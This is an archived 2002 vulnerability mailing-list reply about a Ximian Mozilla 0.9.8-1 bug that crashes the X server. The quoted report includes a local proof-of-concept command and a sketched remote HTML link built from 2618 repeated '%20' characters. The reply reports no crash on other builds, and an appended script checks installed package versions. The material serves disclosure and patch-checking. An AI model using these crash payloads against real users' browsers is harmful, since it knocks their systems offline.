Vulnerability Development mailing list archives

Re: Ximian Mozilla: The 2618 Bug


From: NyQuist <NyQuist () ntlworld com>
Date: 17 Feb 2002 17:48:17 +0000

On Sun, 2002-02-17 at 16:24, Replugge [Rod] wrote:
NOTE TO THE MODERATOR: This was sent yesterday but I guess didn't
make it since this doesn't seem to affect a redhat itself, it affects
the mozilla packages distributed by Ximian:

The test system looks like:

bash#~ rpm -qa | grep mozilla
mozilla-0.9.8-1.ximian.2
mozilla-mail-0.9.8-1.ximian.2
mozilla-xmlterm-0.9.8-1.ximian.2
mozilla-devel-0.9.8-1.ximian.2
nautilus-mozilla-1.0.6-ximian.4
mozilla-psm-0.9.8-1.ximian.2
kdebindings-kmozilla-2.1.1-1

This was tested in both RH7.1 and 7.2 with Ximian Gnome (with all the
updates).


There is a bug in mozilla 0.9.8-1 which allows you
to crash the X server.

I won't go into details I'll just show the proof
of concept.


exploit:

Local:
bash#~ mozilla `perl -e "print '%20' x 2618"`


Remote:
I haven't tested this but I guess:

echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >>
./attack.html

perhaps using "img src" or JavaScript...


Best Regards

-- 
/* 
Rodrigo Gutierrez                   <rodrigo () trustix com>
Trustix AS                         http://www.trustix.com 
*/

On one box: rpm -qa | grep mozilla
mozilla-chat-0.9.7-1
mozilla-mail-0.9.7-1
nautilus-mozilla-1.0.6-ximian.6
mozilla-0.9.7-1
mozilla-devel-0.9.7-1
mozilla-js-debugger-0.9.7-1
mozilla-psm-0.9.7-1
mozilla-dom-inspector-0.9.7-1

Results in "www.perl -e "print %20 x 2618".com could not be found (lol)
perl -e "print '%20' x 2618" prints %20 (2618 times) and doesn't
overflow perl.

On the other box: rpm -qa | grep mozilla
nautilus-mozilla-1.0.6-ximian.6
mozilla-psm-0.9.8-2
mozilla-0.9.8-2
mozilla-devel-0.9.8-2

Results in same 'not found' error.

The attack.html (as per your script) results in "www.'perl not found".
So if it does crash your X, it wasn't present in 0.9.7-1 and is fixed in
0.9.8-2.

-- 
NyQuist | Matthew Hall -- NyQuist at ntlworld dot com 
Sig: Microsoft sells you Windows. Linux gives you the whole house.

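The thread boils down to three builds: Rod's crashing mozilla-0.9.8-1.ximian.2, and the 0.9.7-1 and 0.9.8-2 builds NyQuist could not reproduce it on. The script below is an added example, not code from either poster: it parses `rpm -qa` style NAME-VERSION-RELEASE lines (the last two dash-separated fields are version and release) and flags the core mozilla package against the builds named in this thread; the sample input is constructed from the package lists above.

```shell
#!/bin/sh
# Added example (not from the thread): check an rpm -qa package list
# against the mozilla builds reported in this thread.

# split_nvr NAME-VERSION-RELEASE -> prints "NAME VERSION RELEASE"
# (package names may themselves contain dashes, so split from the right)
split_nvr() {
    nvr=$1
    release=${nvr##*-}      # text after the last dash
    rest=${nvr%-*}          # everything before the last dash
    version=${rest##*-}     # text after the next-to-last dash
    name=${rest%-*}         # what remains is the package name
    printf '%s %s %s\n' "$name" "$version" "$release"
}

# classify_mozilla NVR -> affected | reported-ok | unknown | not-mozilla
# Only the core "mozilla" package is judged; mozilla-mail etc. are skipped.
classify_mozilla() {
    set -- $(split_nvr "$1")
    name=$1; version=$2; release=$3
    [ "$name" = mozilla ] || { echo not-mozilla; return; }
    case "$version-$release" in
        0.9.8-1.ximian.*) echo affected ;;     # Rod's crashing Ximian build
        0.9.7-1|0.9.8-2)  echo reported-ok ;;  # NyQuist saw no crash on these
        *)                echo unknown ;;      # not covered by the thread
    esac
}

# scan_rpm_list: read rpm -qa lines on stdin, print "<package> <verdict>"
# for every package whose name mentions mozilla.
scan_rpm_list() {
    while IFS= read -r line; do
        case "$line" in
            *mozilla*) printf '%s %s\n' "$line" "$(classify_mozilla "$line")" ;;
        esac
    done
}

# Constructed sample input, taken from the package lists in the thread.
sample_rpm_qa() {
    cat <<'EOF'
mozilla-0.9.8-1.ximian.2
mozilla-mail-0.9.8-1.ximian.2
nautilus-mozilla-1.0.6-ximian.4
mozilla-0.9.7-1
EOF
}

sample_rpm_qa | scan_rpm_list
```

On a live system, replace the sample with `rpm -qa | scan_rpm_list`.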
